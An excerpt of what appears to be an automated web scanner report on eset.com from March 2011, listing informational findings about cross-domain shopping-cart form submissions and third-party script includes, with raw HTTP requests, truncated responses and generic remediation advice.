Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.7.10.1300715138; mbox=check#true#1300715233|session#1300715160014-248282#1300717033|PC#1300715160014-248282.17#1301924773; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716973362%3B%20gpv_pageName%3Dus/us/new_homepage%7C1300716973366%3B%20s_nr%3D1300715173368-New%7C1332251173368%3B%20s_invisit%3Dtrue%7C1300716973372%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/us/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24961
Date: Mon, 21 Mar 2011 13:46:15 GMT
X-Varnish: 451499234
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="buy_box_ess">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<div class="windows_box">
...[SNIP]...

5.2. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38145
Date: Mon, 21 Mar 2011 13:46:03 GMT
X-Varnish: 451498404
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content">
<form id="ns_form_4" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.3. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38145
Date: Mon, 21 Mar 2011 13:46:03 GMT
X-Varnish: 451498404
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
</div>
<form id="ns_form_6" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.4. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38145
Date: Mon, 21 Mar 2011 13:46:03 GMT
X-Varnish: 451498404
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content" style="display:none;">
<form id="ns_form_2" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.5. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38145
Date: Mon, 21 Mar 2011 13:46:03 GMT
X-Varnish: 451498404
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.6. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38145
Date: Mon, 21 Mar 2011 13:46:03 GMT
X-Varnish: 451498404
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content" style="display:none;">
<form id="ns_form_3" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.7. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38145
Date: Mon, 21 Mar 2011 13:46:03 GMT
X-Varnish: 451498404
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div>
<form id="ns_form_5" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

6. Cross-domain script include  previous  next
There are 10 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.eset.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=uuss79pefnmjm9rulldneu8oc2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 20-May-2011 13:45:34 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26550
Date: Mon, 21 Mar 2011 13:45:34 GMT
X-Varnish: 451497164
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

6.2. http://www.eset.com/us/business/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/business/products HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19817
Date: Mon, 21 Mar 2011 13:46:02 GMT
X-Varnish: 451498231
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.3. http://www.eset.com/us/company  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/company HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 14782
Date: Mon, 21 Mar 2011 13:46:09 GMT
X-Varnish: 451498872
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>A
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.4. http://www.eset.com/us/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/download HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 115713
Date: Mon, 21 Mar 2011 13:46:05 GMT
X-Varnish: 451498523
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.5. http://www.eset.com/us/download/free-trial/nod32-antivirus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/nod32-antivirus

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/download/free-trial/nod32-antivirus HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715230|session#1300715160014-248282#1300717030|PC#1300715160014-248282.17#1301924770; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.7.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716972086%3B%20gpv_pageName%3Dus/company%7C1300716972094%3B%20s_nr%3D1300715172098-New%7C1332251172098%3B%20s_invisit%3Dtrue%7C1300716972103%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20793
Date: Mon, 21 Mar 2011 13:46:15 GMT
X-Varnish: 451499158
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.6. http://www.eset.com/us/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/home HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17238
Date: Mon, 21 Mar 2011 13:46:01 GMT
X-Varnish: 451498127
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>I
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.7. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
